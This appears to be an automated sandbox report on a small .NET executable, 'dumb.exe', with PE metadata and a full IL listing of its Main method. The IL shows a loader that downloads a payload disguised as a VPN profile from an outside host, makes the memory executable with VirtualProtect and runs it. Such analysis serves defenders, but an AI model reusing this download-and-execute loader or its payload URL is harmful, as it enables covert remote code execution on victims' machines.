Suspicious
Suspect

6587c48966f12eca67de6ab84096888b

PE Executable | MD5: 6587c48966f12eca67de6ab84096888b | Size: 4.1 KB | application/x-dosexec

Characteristics

Symbol Obfuscation Score: Very low


PeID: x64 .NET EXE/DLL ( jmp rax - DBG/noDBG ) Visual Studio v.6.0-11.0
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
Information
Name: Value
Info: PE Detect: PeReader OK (file layout)
Module Name: dumb.exe
Full Name: dumb.exe
EntryPoint: System.Void Reflection.Program::Main()
Scope Name: dumb.exe
Scope Type: ModuleDef
Kind: Console
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: dumb
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 1
Main Method: System.Void Reflection.Program::Main()
Main IL Instruction Count: 40

Main IL:

ldc.i4.1 <null>
call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean)
ldc.i4 3072
call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType)
newobj System.Void System.Net.WebClient::.ctor()
stloc.0 <null>
ldloc.0 <null>
ldstr https://downloads.beaconvistamedical.com/vpn-profile.bin
callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String)
stloc.1 <null>
ldloc.1 <null>
ldc.i4.3 <null>
call System.Runtime.InteropServices.GCHandle System.Runtime.InteropServices.GCHandle::Alloc(System.Object,System.Runtime.InteropServices.GCHandleType)
stloc.2 <null>
ldloca.s V_2
call System.IntPtr System.Runtime.InteropServices.GCHandle::AddrOfPinnedObject()
stloc.3 <null>
ldloc.1 <null>
ldc.i4.0 <null>
ldloc.3 <null>
ldloc.1 <null>
ldlen <null>
conv.i4 <null>
call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32)
ldloc.3 <null>
ldloc.1 <null>
ldlen <null>
conv.i4 <null>
conv.i8 <null>
call System.UIntPtr System.UIntPtr::op_Explicit(System.UInt64)
ldc.i4.s 64
ldloca.s V_4
call System.Boolean Reflection.Program::VirtualProtect(System.IntPtr,System.UIntPtr,System.UInt32,System.UInt32&)
pop <null>
ldloc.3 <null>
call Reflection.Program/coolio System.Runtime.InteropServices.Marshal::GetDelegateForFunctionPointer<Reflection.Program/coolio>(System.IntPtr)
stloc.s V_5
ldloc.s V_5
callvirt System.Void Reflection.Program/coolio::Invoke()
ret <null>

No malware configuration was found at this point.